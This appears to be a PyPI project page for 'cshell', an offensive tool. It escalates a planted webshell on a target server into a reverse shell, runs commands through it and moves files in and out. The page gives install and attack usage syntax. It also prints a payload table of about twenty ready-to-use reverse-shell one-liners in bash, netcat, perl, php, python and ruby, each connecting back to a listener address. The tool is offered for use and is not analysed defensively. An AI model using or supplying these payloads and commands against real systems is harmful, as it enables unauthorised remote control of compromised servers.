A command line tool to transfer transfer a webshell into a reverse shell, execute command directly into the webshell, genrating payload
Project description
CSHELL
This script takes a working webshell as an argument and can perform the following operations
- rev : This option sends a payload according to your choice and triggers that payload on the target webshell<br>
- web : This parameter can execute direct command on the webshell using persisted working directory and error message
- lstnr : This option generates a payload and copies it to the clipboard. It can also start a listener, and also encodes the payload [Both are Optional]
Install
- From PIP library :
pip3 install cshell
- From Github :
git clone https://github.com/0z09e/cshell.git cd cshell sudo python3 setup.py install
Usage
- Help Menu :
$ cshell --help
usage: cshell.py [-h] [--payloads] {rev,web,lstnr} ...
positional arguments:
{rev,web,lstnr}
optional arguments:
-h, --help show this help message and exit
--payloads List all payload formats for rev
web Direct command execution on the webshell with error message
rev Reverse shell from a working webshell
lstnr Generate payload, copy it to your clipboard and start a listener[Optional]
- Getting a reverse shell from a webshell :
- GET Method :
cshell rev -i <Interface or IP> <Target URL with REV as command> - POST Method :
cshell rev -i <Interface or IP> -m POST -d <Post DATA in JSON format with REV as command> <Target URL>
- GET Method :
- Interacting with a webshell :
- GET Method :
cshell web <Target URL with WEB as command> - Post Method :
cshell rev -m POST -d <Post DATA in JSON format with WEB as command> <Target URL>
- GET Method :
- Generating a payload :
cshell lstnr -f <Format> -i <Interface or IP> -p <Port> -f <Payload format>
Custom Commands :
help- Help menu of custom commandsclear- Clear the screenexit- Exit the shellupload- Upload a file into the remote serverdownload- Download a file from the remote server
Payloads
$ cshell --payloads
========================================================================================================
Format-Name Payload
========================================================================================================
bash-196 0<&196;exec 196<>/dev/tcp/127.0.0.1/1337; bash <&196 >&196 2>&196
bash bash -i >& /dev/tcp/127.0.0.1/1337 0>&1
bash-read-line exec 5<>/dev/tcp/127.0.0.1/1337;cat <&5 | while read line; do $line 2>&5 >&5; done
bash-5 bash -i 5<> /dev/tcp/127.0.0.1/1337 0<&5 1>&5 2>&5
bash-udp bash -i >& /dev/udp/127.0.0.1/1337 0>&1
nc-mkfifo rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 127.0.0.1 1337 >/tmp/f
nc nc -e /bin/bash 127.0.0.1 1337
nc-c nc -c /bin/bash 127.0.0.1 1337
ncat-e ncat 127.0.0.1 1337 -e /bin/bash
perl perl -e 'use Socket;$i="127.0.0.1";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("bash -i");};'
php-exec php -r '$sock=fsockopen("127.0.0.1",1337);exec("bash <&3 >&3 2>&3");'
php-shell-exec php -r '$sock=fsockopen("127.0.0.1",1337);shell_exec("bash <&3 >&3 2>&3");'
php-system php -r '$sock=fsockopen("127.0.0.1",1337);system("bash <&3 >&3 2>&3");'
php-passthru php -r '$sock=fsockopen("127.0.0.1",1337);passthru("bash <&3 >&3 2>&3");'
php-popen php -r '$sock=fsockopen("127.0.0.1",1337);popen("bash <&3 >&3 2>&3", "r");'
python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
python-export export RHOST="127.0.0.1";export RPORT=1337;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
python3 python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
python3-export export RHOST="127.0.0.1";export RPORT=1337;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")
ruby export RHOST=127.0.0.1;export RPORT=1337;ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
cshell-1.5.1.tar.gz
(11.2 kB
view details)
Built Distribution
cshell-1.5.1-py3-none-any.whl
(18.4 kB
view details)
File details
Details for the file cshell-1.5.1.tar.gz.
File metadata
- Download URL: cshell-1.5.1.tar.gz
- Upload date:
- Size: 11.2 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/1.15.0 pkginfo/1.7.0 requests/2.25.1 setuptools/44.1.1 requests-toolbelt/0.9.1 tqdm/4.59.0 CPython/2.7.18
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 | 69342ea62f5f8ae489f63723a681c60961cd02395cca55a34a8a9bc2b3470c58 |
|
| MD5 | 53bdf2411d7711211f33ed722b2d8420 |
|
| BLAKE2b-256 | 8a9c7da395608830d1819bc1345e55ccd7495fb612dff3b50f97ed16aaaa0302 |
File details
Details for the file cshell-1.5.1-py3-none-any.whl.
File metadata
- Download URL: cshell-1.5.1-py3-none-any.whl
- Upload date:
- Size: 18.4 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/1.15.0 pkginfo/1.7.0 requests/2.25.1 setuptools/44.1.1 requests-toolbelt/0.9.1 tqdm/4.59.0 CPython/2.7.18
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 | b8c45bf37f35a98528305532ea8d80109cd1dfa03b72ae2462a74084c4a8fba8 |
|
| MD5 | 319de4e34fff821c06d7246789044700 |
|
| BLAKE2b-256 | 88b889b589c77e5d45579876e6a5692bc7d0a65af1e93e4e42e93bd277f079c0 |
